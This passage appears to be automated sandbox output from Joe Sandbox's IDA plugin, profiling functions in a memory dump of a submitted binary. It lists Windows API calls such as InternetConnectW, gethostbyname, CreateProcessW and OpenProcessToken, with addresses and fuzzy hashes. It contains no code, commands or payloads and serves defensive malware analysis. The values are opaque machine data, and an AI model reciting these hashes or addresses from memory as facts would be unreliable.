              • Opcode Fuzzy Hash: 87f4dac28c3455d34f6da9f8840f2bfd6cd2a3ff9a4de9228fa097aacb556f11
              • Instruction Fuzzy Hash: 01219D71E51208EFDB10DFA4C949BEEB7B8EF44354F14409AE458A7341EB31AE06CB60
              APIs
              • __setmode.LIBCMT ref: 001A0BF2
                • Part of subcall function 00185B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,001E7B20,?,?,00000000), ref: 00185B8C
                • Part of subcall function 00185B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,001E7B20,?,?,00000000,?,?), ref: 00185BB0
              • _fprintf.LIBCMT ref: 001A0C29
              • OutputDebugStringW.KERNEL32(?), ref: 001D6331
                • Part of subcall function 001A4CDA: _flsall.LIBCMT ref: 001A4CF3
              • __setmode.LIBCMT ref: 001A0C5E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
              • String ID:
              • API String ID: 521402451-0
              • Opcode ID: 6e7013f36cd9f760011cbfe07b6847f12de38a2c99a1f495f6b7d31aaadeaff8
              • Instruction ID: cc8d5429a50a686b64a47bd47e91a0e499ed60ea4aad8cd71bb6e911543784f3
              • Opcode Fuzzy Hash: 6e7013f36cd9f760011cbfe07b6847f12de38a2c99a1f495f6b7d31aaadeaff8
              • Instruction Fuzzy Hash: 70115C399042047FCB09B7B4AC479BE7B69DFA7320F14015AF204571C2DFA15D568791
              APIs
              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001F1A97
                • Part of subcall function 001F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001F1B40
                • Part of subcall function 001F1B21: InternetCloseHandle.WININET(00000000), ref: 001F1BDD
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Internet$CloseConnectHandleOpen
              • String ID:
              • API String ID: 1463438336-0
              • Opcode ID: ba7bce5afd91b210a4a1bb65345d1656757fce9b061744d1025e7055708ab5c5
              • Instruction ID: a7d291d5c286f5529b0b440a3344cb0cec0be5e25d718ad0368f92b84baa6901
              • Opcode Fuzzy Hash: ba7bce5afd91b210a4a1bb65345d1656757fce9b061744d1025e7055708ab5c5
              • Instruction Fuzzy Hash: D221CF31240708FFDB269F608C04FBAB7B9FF94700F10001AFB0696661EB7198119BA1
              APIs
                • Part of subcall function 001DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,001DE1C4,?,?,?,001DEFB7,00000000,000000EF,00000119,?,?), ref: 001DF5BC
                • Part of subcall function 001DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 001DF5E2
                • Part of subcall function 001DF5AD: lstrcmpiW.KERNEL32(00000000,?,001DE1C4,?,?,?,001DEFB7,00000000,000000EF,00000119,?,?), ref: 001DF613
              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,001DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 001DE1DD
              • lstrcpyW.KERNEL32(00000000,?), ref: 001DE203
              • lstrcmpiW.KERNEL32(00000002,cdecl,?,001DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 001DE237
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: lstrcmpilstrcpylstrlen
              • String ID: cdecl
              • API String ID: 4031866154-3896280584
              • Opcode ID: 72de4d2d63c87b9b8b02553cc02fabb383e9b8c5b75074af29d66a1f4cf7803f
              • Instruction ID: 4c5771f83e1a7f6a0e1abda2db45735f32fdc652a6d2b28f28d3703817709c33
              • Opcode Fuzzy Hash: 72de4d2d63c87b9b8b02553cc02fabb383e9b8c5b75074af29d66a1f4cf7803f
              • Instruction Fuzzy Hash: 35115E3A200345EFCB25AF64EC4997A77B9FF99350B40412BF816CB260EB71A951D7A0
              APIs
              • _free.LIBCMT ref: 001B5351
                • Part of subcall function 001A594C: __FF_MSGBANNER.LIBCMT ref: 001A5963
                • Part of subcall function 001A594C: __NMSG_WRITE.LIBCMT ref: 001A596A
                • Part of subcall function 001A594C: RtlAllocateHeap.NTDLL(01410000,00000000,00000001,00000000,?,?,?,001A1013,?), ref: 001A598F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AllocateHeap_free
              • String ID:
              • API String ID: 614378929-0
              • Opcode ID: d4824805c9afc3c5c23c9351e8b08a4a0c92830deff4d1d6e0ca1b5d9de01970
              • Instruction ID: f8d1b1bdd39288f35c81417a7b20b123d3b4a0c53cc72dd34d708bb19757e153
              • Opcode Fuzzy Hash: d4824805c9afc3c5c23c9351e8b08a4a0c92830deff4d1d6e0ca1b5d9de01970
              • Instruction Fuzzy Hash: 2A11E736904B15AFCB353F74BC0579D37D67F263B0B204429F9049A2B1DFB589408750
              APIs
              • _memset.LIBCMT ref: 00184560
                • Part of subcall function 0018410D: _memset.LIBCMT ref: 0018418D
                • Part of subcall function 0018410D: _wcscpy.LIBCMT ref: 001841E1
                • Part of subcall function 0018410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001841F1
              • KillTimer.USER32(?,00000001,?,?), ref: 001845B5
              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001845C4
              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001BD6CE
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
              • String ID:
              • API String ID: 1378193009-0
              • Opcode ID: a5b8a7ff904092d42cd90a909a6917890660ca55a3cc5ead33951b567bd617dd
              • Instruction ID: 9095f0f14c9c3b530eb15d19f53c39be80dcd8edc39967c6c7d77e01d09bcb94
              • Opcode Fuzzy Hash: a5b8a7ff904092d42cd90a909a6917890660ca55a3cc5ead33951b567bd617dd
              • Instruction Fuzzy Hash: C621F970904784AFEB369B24EC49BEBBBEC9F11304F04009EE69E96241D7B45A84CF52
              APIs
              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 001E40D1
              • _memset.LIBCMT ref: 001E40F2
              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001E4144
              • CloseHandle.KERNEL32(00000000), ref: 001E414D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseControlCreateDeviceFileHandle_memset
              • String ID:
              • API String ID: 1157408455-0
              • Opcode ID: c9426ca5fa21f1b9d3307530f4289fae86b7d225749141882266ff04193614a7
              • Instruction ID: 1eeb2fb494c5b22fb19550ee50da4be2472c903b5aff4ab75196209530338334
              • Opcode Fuzzy Hash: c9426ca5fa21f1b9d3307530f4289fae86b7d225749141882266ff04193614a7
              • Instruction Fuzzy Hash: D311A7759413287AD7309BA5AC4DFEFBB7CEF45760F1041AAF908D7180D6744E808BA4
              APIs
                • Part of subcall function 00185B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,001E7B20,?,?,00000000), ref: 00185B8C
                • Part of subcall function 00185B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,001E7B20,?,?,00000000,?,?), ref: 00185BB0
              • gethostbyname.WSOCK32(?,?,?), ref: 001F66AC
              • WSAGetLastError.WSOCK32(00000000), ref: 001F66B7
              • _memmove.LIBCMT ref: 001F66E4
              • inet_ntoa.WSOCK32(?), ref: 001F66EF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
              • String ID:
              • API String ID: 1504782959-0
              • Opcode ID: 152f64d66a78dc8b40d0ce31d76b4a0820313d952b576b3c491fdf1b50f72f3d
              • Instruction ID: da7b46740b4285db601704478dc94e3ce4e8fec735bdd929a3db099bf9328062
              • Opcode Fuzzy Hash: 152f64d66a78dc8b40d0ce31d76b4a0820313d952b576b3c491fdf1b50f72f3d
              • Instruction Fuzzy Hash: D9112E35500509AFCB04FBA4DD96DEEB7B9EF64310B144165F506A7162DF30AF14CB61
              APIs
              • SendMessageW.USER32(?,000000B0,?,?), ref: 001D9043
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D9055
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D906B
              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D9086
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 12de1de81909ccae8ef746ecbe51ef562fefc20b2b10c424697ce5e379698fcc
              • Instruction ID: ff3ad08746ce609c2bfd2750d5389adb4d40930269616420203473d5e8ce822f
              • Opcode Fuzzy Hash: 12de1de81909ccae8ef746ecbe51ef562fefc20b2b10c424697ce5e379698fcc
              • Instruction Fuzzy Hash: B9114C79940218FFDB10DFA5C984E9DBB78FB48310F204196F904B7250D7726E11DB90
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • DefDlgProcW.USER32(?,00000020,?), ref: 001812D8
              • GetClientRect.USER32(?,?), ref: 001BB84B
              • GetCursorPos.USER32(?), ref: 001BB855
              • ScreenToClient.USER32(?,?), ref: 001BB860
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Client$CursorLongProcRectScreenWindow
              • String ID:
              • API String ID: 4127811313-0
              • Opcode ID: d3aed986910b168afea0ea635d7830109533e346305b7274fb74c014ccdd56e0
              • Instruction ID: 7e6eb35f2688699b17b85142f420fc8d4c9032c88c5259896a789e37a010d545
              • Opcode Fuzzy Hash: d3aed986910b168afea0ea635d7830109533e346305b7274fb74c014ccdd56e0
              • Instruction Fuzzy Hash: 38116A36900119BFCB10EF94E8899EE77BDEB05300F600456F911E3151C730BA528FA5
              APIs
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001E01FD,?,001E1250,?,00008000), ref: 001E166F
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,001E01FD,?,001E1250,?,00008000), ref: 001E1694
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001E01FD,?,001E1250,?,00008000), ref: 001E169E
              • Sleep.KERNEL32(?,?,?,?,?,?,?,001E01FD,?,001E1250,?,00008000), ref: 001E16D1
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CounterPerformanceQuerySleep
              • String ID:
              • API String ID: 2875609808-0
              • Opcode ID: c1586fa238783de2773a576b8540536f640dc3aa3f138a04e7df12d44f070781
              • Instruction ID: 7244af8f786d3d1f6578c703a33db3006f65d27c6a8f0640628543a67f2d4ce6
              • Opcode Fuzzy Hash: c1586fa238783de2773a576b8540536f640dc3aa3f138a04e7df12d44f070781
              • Instruction Fuzzy Hash: 1D117C31C00A1CE7CF00AFA6E948AEEBB78FF0D701F454059E944B6240CB7055A08BD6
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction ID: 87cef8579b917a8c811e3d925717f838b62fe329029b2773ee097cfa9ae19e26
              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction Fuzzy Hash: 34018C3204818ABBCF125E84CC018EE3F22BFA9354F098695FA1868071C337C9B1AB81
              APIs
              • GetWindowRect.USER32(?,?), ref: 0020B59E
              • ScreenToClient.USER32(?,?), ref: 0020B5B6
              • ScreenToClient.USER32(?,?), ref: 0020B5DA
              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0020B5F5
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClientRectScreen$InvalidateWindow
              • String ID:
              • API String ID: 357397906-0
              • Opcode ID: eac0af2291b5e14c855f488ec6cc1af9d6510c66074f1d2a3e2acb487f0e6e58
              • Instruction ID: 4e1cf64223aefc161bdcd48df1568f2d313346e2460ff693fadd9ac786c47f16
              • Opcode Fuzzy Hash: eac0af2291b5e14c855f488ec6cc1af9d6510c66074f1d2a3e2acb487f0e6e58
              • Instruction Fuzzy Hash: C71166B5D0020AEFDB51CF99D9449EEFBB9FB08310F104166E914E3621D731AA618F50
              APIs
              • _memset.LIBCMT ref: 0020B8FE
              • _memset.LIBCMT ref: 0020B90D
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00247F20,00247F64), ref: 0020B93C
              • CloseHandle.KERNEL32 ref: 0020B94E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memset$CloseCreateHandleProcess
              • String ID:
              • API String ID: 3277943733-0
              • Opcode ID: 25c1114a53cfeb8c0df69264d255a2e443e8ca728ec7c3e36ebc098fdd1af9f3
              • Instruction ID: 41af4192a3787ed861911bc6784a0b1b479a5c6798c2a73e7bc749ba1873c945
              • Opcode Fuzzy Hash: 25c1114a53cfeb8c0df69264d255a2e443e8ca728ec7c3e36ebc098fdd1af9f3
              • Instruction Fuzzy Hash: 74F082B65943047BF3202B61BC09FBB7A5CEB1A754F010470BF18D9692E7724D1487E8
              APIs
              • EnterCriticalSection.KERNEL32(?), ref: 001E6E88
                • Part of subcall function 001E794E: _memset.LIBCMT ref: 001E7983
              • _memmove.LIBCMT ref: 001E6EAB
              • _memset.LIBCMT ref: 001E6EB8
              • LeaveCriticalSection.KERNEL32(?), ref: 001E6EC8
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CriticalSection_memset$EnterLeave_memmove
              • String ID:
              • API String ID: 48991266-0
              • Opcode ID: bb753df18b2f9428252ae2b71119b3c9a6fb799621b9046dfe7244565025d44d
              • Instruction ID: bc9b6af2af0b618863bbef5425a016cb3880a747954f397d39df221c48a32955
              • Opcode Fuzzy Hash: bb753df18b2f9428252ae2b71119b3c9a6fb799621b9046dfe7244565025d44d
              • Instruction Fuzzy Hash: 24F05E3A200200BBCF516F55ED85A8ABB2AEF55320F088061FE085E22BC731E911CBB4
              APIs
                • Part of subcall function 001812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0018134D
                • Part of subcall function 001812F3: SelectObject.GDI32(?,00000000), ref: 0018135C
                • Part of subcall function 001812F3: BeginPath.GDI32(?), ref: 00181373
                • Part of subcall function 001812F3: SelectObject.GDI32(?,00000000), ref: 0018139C
              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0020C030
              • LineTo.GDI32(00000000,?,?), ref: 0020C03D
              • EndPath.GDI32(00000000), ref: 0020C04D
              • StrokePath.GDI32(00000000), ref: 0020C05B
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
              • String ID:
              • API String ID: 1539411459-0
              • Opcode ID: a9248183a75c8d07bbad336a708cbf6313d794153925a6e9d5ed04fe5d9f11cc
              • Instruction ID: 396699464a1a06a56e95f4989df40f3221ac3db01169503d3f412f77337c309e
              • Opcode Fuzzy Hash: a9248183a75c8d07bbad336a708cbf6313d794153925a6e9d5ed04fe5d9f11cc
              • Instruction Fuzzy Hash: 84F09A32040319BADB226F50BC0DFCA3B5AAF16710F148100FA11214E287A50665CB95
              APIs
              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001DA399
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 001DA3AC
              • GetCurrentThreadId.KERNEL32 ref: 001DA3B3
              • AttachThreadInput.USER32(00000000), ref: 001DA3BA
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
              • String ID:
              • API String ID: 2710830443-0
              • Opcode ID: 8a1e4b0f97c9203f3b95c95409a6b5179067cecb82b1f85716490dfc842f13ac
              • Instruction ID: 5042d9aadab8e8bd1675af4ab960a8ad15eeb3a1ed8fe3956bf65dfffc9143c5
              • Opcode Fuzzy Hash: 8a1e4b0f97c9203f3b95c95409a6b5179067cecb82b1f85716490dfc842f13ac
              • Instruction Fuzzy Hash: 78E03931581328BADB209FA2ED0CED77F1CFF167A1F408025F50884461CB72C540CBA0
              APIs
              • GetSysColor.USER32(00000008), ref: 00182231
              • SetTextColor.GDI32(?,000000FF), ref: 0018223B
              • SetBkMode.GDI32(?,00000001), ref: 00182250
              • GetStockObject.GDI32(00000005), ref: 00182258
              • GetWindowDC.USER32(?,00000000), ref: 001BC0D3
              • GetPixel.GDI32(00000000,00000000,00000000), ref: 001BC0E0
              • GetPixel.GDI32(00000000,?,00000000), ref: 001BC0F9
              • GetPixel.GDI32(00000000,00000000,?), ref: 001BC112
              • GetPixel.GDI32(00000000,?,?), ref: 001BC132
              • ReleaseDC.USER32(?,00000000), ref: 001BC13D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
              • String ID:
              • API String ID: 1946975507-0
              • Opcode ID: 3acb961253e8afe7a029dd2620eb00cbd1f7a52509471709a021b55f9912858f
              • Instruction ID: 8ed2016f05202f047a119bccdf42045eaef71b0d1e1fee415add6ebba3df680c
              • Opcode Fuzzy Hash: 3acb961253e8afe7a029dd2620eb00cbd1f7a52509471709a021b55f9912858f
              • Instruction Fuzzy Hash: 48E06D32140244EADFB15F68FD0D7D87B10EB15332F048366FA6D580E287B14990DF51
              APIs
              • GetCurrentThread.KERNEL32 ref: 001D8C63
              • OpenThreadToken.ADVAPI32(00000000,?,?,?,001D882E), ref: 001D8C6A
              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001D882E), ref: 001D8C77
              • OpenProcessToken.ADVAPI32(00000000,?,?,?,001D882E), ref: 001D8C7E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
